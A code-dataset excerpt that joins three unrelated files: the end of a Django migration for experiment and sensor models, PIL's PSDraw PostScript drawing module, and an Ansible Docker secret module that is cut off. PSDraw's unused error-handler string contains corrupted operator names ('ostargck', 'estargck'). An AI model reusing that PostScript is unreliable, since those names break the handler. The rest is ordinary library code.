'sensor': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.ForceSensor']"}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Unit']", 'null': 'True'})
},
u'feed.forcesensor': {
'Meta': {'object_name': 'ForceSensor', '_ormbases': [u'feed.Sensor']},
u'sensor_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Sensor']", 'unique': 'True', 'primary_key': 'True'})
},
u'feed.forcesetup': {
'Meta': {'object_name': 'ForceSetup', '_ormbases': [u'feed.Setup']},
u'setup_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Setup']", 'unique': 'True', 'primary_key': 'True'})
},
u'feed.illustration': {
'Meta': {'object_name': 'Illustration'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'illustration_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
'experiment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Experiment']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'picture': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'setup': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Setup']", 'null': 'True', 'blank': 'True'}),
'subject': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Subject']", 'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.kinematicschannel': {
'Meta': {'object_name': 'KinematicsChannel', '_ormbases': [u'feed.Channel']},
u'channel_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Channel']", 'unique': 'True', 'primary_key': 'True'}),
'sensor': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.KinematicsSensor']"}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Unit']", 'null': 'True'})
},
u'feed.kinematicssensor': {
'Meta': {'object_name': 'KinematicsSensor', '_ormbases': [u'feed.Sensor']},
u'sensor_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Sensor']", 'unique': 'True', 'primary_key': 'True'})
},
u'feed.kinematicssetup': {
'Meta': {'object_name': 'KinematicsSetup', '_ormbases': [u'feed.Setup']},
u'setup_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Setup']", 'unique': 'True', 'primary_key': 'True'})
},
u'feed.mediallateralaxis': {
'Meta': {'object_name': 'MedialLateralAxis'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'mediallateralaxis_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.muscleowl': {
'Meta': {'object_name': 'MuscleOwl'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'obo_definition': ('django.db.models.fields.TextField', [], {}),
'rdfs_comment': ('django.db.models.fields.TextField', [], {}),
'rdfs_subClassOf_ancestors': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['feed.MuscleOwl']", 'symmetrical': 'False'}),
'uri': ('django.db.models.fields.CharField', [], {'max_length': '1500'})
},
u'feed.pressurechannel': {
'Meta': {'object_name': 'PressureChannel', '_ormbases': [u'feed.Channel']},
u'channel_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Channel']", 'unique': 'True', 'primary_key': 'True'}),
'sensor': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.PressureSensor']"}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Unit']", 'null': 'True'})
},
u'feed.pressuresensor': {
'Meta': {'object_name': 'PressureSensor', '_ormbases': [u'feed.Sensor']},
u'sensor_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Sensor']", 'unique': 'True', 'primary_key': 'True'})
},
u'feed.pressuresetup': {
'Meta': {'object_name': 'PressureSetup', '_ormbases': [u'feed.Setup']},
u'setup_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Setup']", 'unique': 'True', 'primary_key': 'True'})
},
u'feed.proximaldistalaxis': {
'Meta': {'object_name': 'ProximalDistalAxis'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'proximaldistalaxis_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.restraint': {
'Meta': {'ordering': "['label']", 'object_name': 'Restraint'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'restraint_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.sensor': {
'Meta': {'object_name': 'Sensor'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'sensor_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'loc_ap': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.AnteriorPosteriorAxis']", 'null': 'True', 'blank': 'True'}),
'loc_dv': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.DorsalVentralAxis']", 'null': 'True', 'blank': 'True'}),
'loc_ml': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.MedialLateralAxis']", 'null': 'True', 'blank': 'True'}),
'loc_pd': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.ProximalDistalAxis']", 'null': 'True', 'blank': 'True'}),
'loc_side': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Side']"}),
'location_freetext': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'setup': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Setup']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.session': {
'Meta': {'ordering': "['position']", 'object_name': 'Session'},
'accession': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'bookkeeping': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'channels': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['feed.Channel']", 'through': u"orm['feed.ChannelLineup']", 'symmetrical': 'False'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'session_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
'end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'experiment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Experiment']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'position': ('django.db.models.fields.IntegerField', [], {}),
'start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'subj_anesthesia_sedation': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'subj_notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'subj_restraint': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Restraint']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.setup': {
'Meta': {'object_name': 'Setup'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'setup_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
'experiment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Experiment']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'sampling_rate': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'technique': ('django.db.models.fields.IntegerField', [], {}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.side': {
'Meta': {'ordering': "['label']", 'object_name': 'Side'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'side_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.sonochannel': {
'Meta': {'object_name': 'SonoChannel', '_ormbases': [u'feed.Channel']},
u'channel_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Channel']", 'unique': 'True', 'primary_key': 'True'}),
'crystal1': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'crystals1_related'", 'to': u"orm['feed.SonoSensor']"}),
'crystal2': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'crystals2_related'", 'to': u"orm['feed.SonoSensor']"}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Unit']"})
},
u'feed.sonosensor': {
'Meta': {'object_name': 'SonoSensor', '_ormbases': [u'feed.Sensor']},
'axisdepth': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.DepthAxis']", 'null': 'True', 'blank': 'True'}),
'location_controlled': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.AnatomicalLocation']"}),
'muscle': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.MuscleOwl']", 'null': 'True'}),
u'sensor_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Sensor']", 'unique': 'True', 'primary_key': 'True'})
},
u'feed.sonosetup': {
'Meta': {'object_name': 'SonoSetup', '_ormbases': [u'feed.Setup']},
u'setup_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Setup']", 'unique': 'True', 'primary_key': 'True'}),
'sonomicrometer': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'feed.strainchannel': {
'Meta': {'object_name': 'StrainChannel', '_ormbases': [u'feed.Channel']},
u'channel_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Channel']", 'unique': 'True', 'primary_key': 'True'}),
'sensor': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.StrainSensor']"}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Unit']", 'null': 'True'})
},
u'feed.strainsensor': {
'Meta': {'object_name': 'StrainSensor', '_ormbases': [u'feed.Sensor']},
u'sensor_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Sensor']", 'unique': 'True', 'primary_key': 'True'})
},
u'feed.strainsetup': {
'Meta': {'object_name': 'StrainSetup', '_ormbases': [u'feed.Setup']},
u'setup_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Setup']", 'unique': 'True', 'primary_key': 'True'})
},
u'feed.study': {
'Meta': {'ordering': "['title']", 'object_name': 'Study'},
'accession': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'approval_secured': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'bookkeeping': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'study_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {}),
'end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'funding_agency': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'resources': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'start': ('django.db.models.fields.DateTimeField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.studyprivate': {
'Meta': {'object_name': 'StudyPrivate'},
'approval': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'studyprivate_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
'funding': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lab': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'organization': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'pi': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'study': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Study']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.subject': {
'Meta': {'object_name': 'Subject'},
'breed': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'subject_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'sex': ('django.db.models.fields.CharField', [], {'max_length': '2', 'null': 'True', 'blank': 'True'}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'study': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Study']"}),
'taxon': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Taxon']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.taxon': {
'Meta': {'ordering': "['genus']", 'object_name': 'Taxon'},
'common_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'taxon_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
'genus': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'species': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.trial': {
'Meta': {'object_name': 'Trial'},
'accession': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'behavior_notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'behavior_primary': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Behavior']"}),
'behavior_secondary': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'bookkeeping': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'trial_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
'data_file': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'estimated_duration': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'food_property': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'food_size': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'food_type': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'position': ('django.db.models.fields.IntegerField', [], {}),
'session': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Session']"}),
'start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'subj_notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'subj_treatment': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {}),
'waveform_picture': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'})
},
u'feed.unit': {
'Meta': {'ordering': "['technique', 'label']", 'object_name': 'Unit'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'unit_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'technique': ('django.db.models.fields.IntegerField', [], {}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
}
}
complete_apps = ['feed']
|
gpl-3.0
|
ardi69/pyload-0.4.10
|
lib/Python/Lib/PIL/PSDraw.py
|
20
|
6872
|
#
# The Python Imaging Library
# $Id$
#
# simple postscript graphics interface
#
# History:
# 1996-04-20 fl Created
# 1999-01-10 fl Added gsave/grestore to image method
# 2005-05-04 fl Fixed floating point issue in image (from Eric Etheridge)
#
# Copyright (c) 1997-2005 by Secret Labs AB. All rights reserved.
# Copyright (c) 1996 by Fredrik Lundh.
#
# See the README file for information on usage and redistribution.
#
from __future__ import print_function
from PIL import EpsImagePlugin
##
# Simple Postscript graphics interface.
class PSDraw:
"""
Sets up printing to the given file. If **file** is omitted,
:py:attr:`sys.stdout` is assumed.
"""
def __init__(self, fp=None):
if not fp:
import sys
fp = sys.stdout
self.fp = fp
def _fp_write(self, to_write):
if bytes is str:
self.fp.write(to_write)
else:
self.fp.write(bytes(to_write, 'UTF-8'))
def begin_document(self, id=None):
"""Set up printing of a document. (Write Postscript DSC header.)"""
# FIXME: incomplete
self._fp_write("%!PS-Adobe-3.0\n"
"save\n"
"/showpage { } def\n"
"%%EndComments\n"
"%%BeginDocument\n")
# self.fp_write(ERROR_PS) # debugging!
self._fp_write(EDROFF_PS)
self._fp_write(VDI_PS)
self._fp_write("%%EndProlog\n")
self.isofont = {}
def end_document(self):
"""Ends printing. (Write Postscript DSC footer.)"""
self._fp_write("%%EndDocument\n"
"restore showpage\n"
"%%End\n")
if hasattr(self.fp, "flush"):
self.fp.flush()
def setfont(self, font, size):
"""
Selects which font to use.
:param font: A Postscript font name
:param size: Size in points.
"""
if font not in self.isofont:
# reencode font
self._fp_write("/PSDraw-%s ISOLatin1Encoding /%s E\n" %
(font, font))
self.isofont[font] = 1
# rough
self._fp_write("/F0 %d /PSDraw-%s F\n" % (size, font))
def line(self, xy0, xy1):
"""
Draws a line between the two points. Coordinates are given in
Postscript point coordinates (72 points per inch, (0, 0) is the lower
left corner of the page).
"""
xy = xy0 + xy1
self._fp_write("%d %d %d %d Vl\n" % xy)
def rectangle(self, box):
"""
Draws a rectangle.
:param box: A 4-tuple of integers whose order and function is currently
undocumented.
Hint: the tuple is passed into this format string:
.. code-block:: python
%d %d M %d %d 0 Vr\n
"""
self._fp_write("%d %d M %d %d 0 Vr\n" % box)
def text(self, xy, text):
"""
Draws text at the given position. You must use
:py:meth:`~PIL.PSDraw.PSDraw.setfont` before calling this method.
"""
text = "\\(".join(text.split("("))
text = "\\)".join(text.split(")"))
xy = xy + (text,)
self._fp_write("%d %d M (%s) S\n" % xy)
def image(self, box, im, dpi=None):
"""Draw a PIL image, centered in the given box."""
# default resolution depends on mode
if not dpi:
if im.mode == "1":
dpi = 200 # fax
else:
dpi = 100 # greyscale
# image size (on paper)
x = float(im.size[0] * 72) / dpi
y = float(im.size[1] * 72) / dpi
# max allowed size
xmax = float(box[2] - box[0])
ymax = float(box[3] - box[1])
if x > xmax:
y = y * xmax / x
x = xmax
if y > ymax:
x = x * ymax / y
y = ymax
dx = (xmax - x) / 2 + box[0]
dy = (ymax - y) / 2 + box[1]
self._fp_write("gsave\n%f %f translate\n" % (dx, dy))
if (x, y) != im.size:
# EpsImagePlugin._save prints the image at (0,0,xsize,ysize)
sx = x / im.size[0]
sy = y / im.size[1]
self._fp_write("%f %f scale\n" % (sx, sy))
EpsImagePlugin._save(im, self.fp, None, 0)
self._fp_write("\ngrestore\n")
# --------------------------------------------------------------------
# Postscript driver
#
# EDROFF.PS -- Postscript driver for Edroff 2
#
# History:
# 94-01-25 fl: created (edroff 2.04)
#
# Copyright (c) Fredrik Lundh 1994.
#
EDROFF_PS = """\
/S { show } bind def
/P { moveto show } bind def
/M { moveto } bind def
/X { 0 rmoveto } bind def
/Y { 0 exch rmoveto } bind def
/E { findfont
dup maxlength dict begin
{
1 index /FID ne { def } { pop pop } ifelse
} forall
/Encoding exch def
dup /FontName exch def
currentdict end definefont pop
} bind def
/F { findfont exch scalefont dup setfont
[ exch /setfont cvx ] cvx bind def
} bind def
"""
#
# VDI.PS -- Postscript driver for VDI meta commands
#
# History:
# 94-01-25 fl: created (edroff 2.04)
#
# Copyright (c) Fredrik Lundh 1994.
#
VDI_PS = """\
/Vm { moveto } bind def
/Va { newpath arcn stroke } bind def
/Vl { moveto lineto stroke } bind def
/Vc { newpath 0 360 arc closepath } bind def
/Vr { exch dup 0 rlineto
exch dup neg 0 exch rlineto
exch neg 0 rlineto
0 exch rlineto
100 div setgray fill 0 setgray } bind def
/Tm matrix def
/Ve { Tm currentmatrix pop
translate scale newpath 0 0 .5 0 360 arc closepath
Tm setmatrix
} bind def
/Vf { currentgray exch setgray fill setgray } bind def
"""
#
# ERROR.PS -- Error handler
#
# History:
# 89-11-21 fl: created (pslist 1.10)
#
ERROR_PS = """\
/landscape false def
/errorBUF 200 string def
/errorNL { currentpoint 10 sub exch pop 72 exch moveto } def
errordict begin /handleerror {
initmatrix /Courier findfont 10 scalefont setfont
newpath 72 720 moveto $error begin /newerror false def
(PostScript Error) show errorNL errorNL
(Error: ) show
/errorname load errorBUF cvs show errorNL errorNL
(Command: ) show
/command load dup type /stringtype ne { errorBUF cvs } if show
errorNL errorNL
(VMstatus: ) show
vmstatus errorBUF cvs show ( bytes available, ) show
errorBUF cvs show ( bytes used at level ) show
errorBUF cvs show errorNL errorNL
(Operand stargck: ) show errorNL /ostargck load {
dup type /stringtype ne { errorBUF cvs } if 72 0 rmoveto show errorNL
} forall errorNL
(Execution stargck: ) show errorNL /estargck load {
dup type /stringtype ne { errorBUF cvs } if 72 0 rmoveto show errorNL
} forall
end showpage
} def end
"""
|
gpl-3.0
|
GheRivero/ansible
|
lib/ansible/modules/cloud/docker/docker_secret.py
|
16
|
8297
|
#!/usr/bin/python
#
# Copyright 2016 Red Hat | Ansible
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: docker_secret
short_description: Manage docker secrets.
version_added: "2.4"
description:
- Create and remove Docker secrets in a Swarm environment. Similar to `docker secret create` and `docker secret rm`.
- Adds to the metadata of new secrets 'ansible_key', an encrypted hash representation of the data, which is then used
- in future runs to test if a secret has changed.
- If 'ansible_key is not present, then a secret will not be updated unless the C(force) option is set.
- Updates to secrets are performed by removing the secret and creating it again.
options:
data:
description:
- String. The value of the secret. Required when state is C(present).
required: false
labels:
description:
- "A map of key:value meta data, where both the I(key) and I(value) are expected to be a string."
- If new meta data is provided, or existing meta data is modified, the secret will be updated by removing it and creating it again.
required: false
force:
description:
- Use with state C(present) to always remove and recreate an existing secret.
- If I(true), an existing secret will be replaced, even if it has not changed.
default: false
type: bool
name:
description:
- The name of the secret.
required: true
state:
description:
- Set to C(present), if the secret should exist, and C(absent), if it should not.
required: false
default: present
choices:
- absent
- present
extends_documentation_fragment:
- docker
requirements:
- "docker-py >= 2.1.0"
- "Docker API >= 1.25"
author:
- Chris Houseknecht (@chouseknecht)
'''
EXAMPLES = '''
- name: Create secret foo
docker_secret:
name: foo
data: Hello World!
state: present
- name: Change the secret data
docker_secret:
name: foo
data: Goodnight everyone!
labels:
bar: baz
one: '1'
state: present
- name: Add a new label
docker_secret:
name: foo
data: Goodnight everyone!
labels:
bar: baz
one: '1'
# Adding a new label will cause a remove/create of the secret
two: '2'
state: present
- name: No change
docker_secret:
name: foo
data: Goodnight everyone!
labels:
bar: baz
one: '1'
# Even though 'two' is missing, there is no change to the existing secret
state: present
- name: Update an existing label
docker_secret:
name: foo
data: Goodnight everyone!
labels:
bar: monkey # Changing a label will cause a remove/create of the secret
one: '1'
state: present
- name: Force the removal/creation of the secret
docker_secret:
name: foo
data: Goodnight everyone!
force: yes
state: present
- name: Remove secret foo
docker_secret:
name: foo
state: absent
'''
RETURN = '''
secret_id:
description:
- The ID assigned by Docker to the secret object.
returned: success
type: string
sample: 'hzehrmyjigmcp2gb6nlhmjqcv'
'''
import hashlib
try:
from docker.errors import APIError
except ImportError:
# missing docker-py handled in ansible.module_utils.docker
pass
from ansible.module_utils.docker_common import AnsibleDockerClient, DockerBaseClass
from ansible.module_utils._text import to_native, to_bytes
class SecretManager(DockerBaseClass):
def __init__(self, client, results):
super(SecretManager, self).__init__()
self.client = client
self.results = results
self.check_mode = self.client.check_mode
parameters = self.client.module.params
self.name = parameters.get('name')
self.state = parameters.get('state')
self.data = parameters.get('data')
self.labels = parameters.get('labels')
self.force = parameters.get('force')
self.data_key = None
def __call__(self):
if self.state == 'present':
self.data_key = hashlib.sha224(to_bytes(self.data)).hexdigest()
self.present()
elif self.state == 'absent':
self.absent()
def get_secret(self):
''' Find an existing secret. '''
try:
secrets = self.client.secrets(filters={'name': self.name})
except APIError as exc:
self.client.fail("Error accessing secret %s: %s" % (self.name, to_native(exc)))
for secret in secrets:
if secret['Spec']['Name'] == self.name:
return secret
return None
def create_secret(self):
''' Create a new secret '''
secret_id = None
# We can't see the data after creation, so adding a label we can use for idempotency check
labels = {
'ansible_key': self.data_key
}
if self.labels:
labels.update(self.labels)
try:
if not self.check_mode:
secret_id = self.client.create_secret(self.name, self.data, labels=labels)
except APIError as exc:
self.client.fail("Error creating secret: %s" % to_native(exc))
if isinstance(secret_id, dict):
secret_id = secret_id['ID']
return secret_id
def present(self):
''' Handles state == 'present', creating or updating the secret '''
secret = self.get_secret()
if secret:
self.results['secret_id'] = secret['ID']
data_changed = False
attrs = secret.get('Spec', {})
if attrs.get('Labels', {}).get('ansible_key'):
if attrs['Labels']['ansible_key'] != self.data_key:
data_changed = True
labels_changed = False
if self.labels and attrs.get('Labels'):
# check if user requested a label change
for label in attrs['Labels']:
if self.labels.get(label) and self.labels[label] != attrs['Labels'][label]:
labels_changed = True
# check if user added a label
labels_added = False
if self.labels:
if attrs.get('Labels'):
for label in self.labels:
if label not in attrs['Labels']:
labels_added = True
else:
labels_added = True
if data_changed or labels_added or labels_changed or self.force:
# if something changed or force, delete and re-create the secret
self.absent()
secret_id = self.create_secret()
self.results['changed'] = True
self.results['secret_id'] = secret_id
else:
self.results['changed'] = True
self.results['secret_id'] = self.create_secret()
def absent(self):
''' Handles state == 'absent', removing the secret '''
secret = self.get_secret()
if secret:
try:
if not self.check_mode:
self.client.remove_secret(secret['ID'])
except APIError as exc:
self.client.fail("Error removing secret %s: %s" % (self.name, to_native(exc)))
self.results['changed'] = True
def main():
argument_spec = dict(
name=dict(type='str', required=True),
state=dict(type='str', choices=['absent', 'present'], default='present'),
data=dict(type='str', no_log=True),
labels=dict(type='dict'),
force=dict(type='bool', default=False)
)
required_if = [
('state', 'present', ['data'])
]
client = AnsibleDockerClient(
argument_spec=argument_spec,
supports_check_mode=True,
required_if=required_if
)
results = dict(
changed=False,
secret_id=''
)
SecretManager(client, results)()
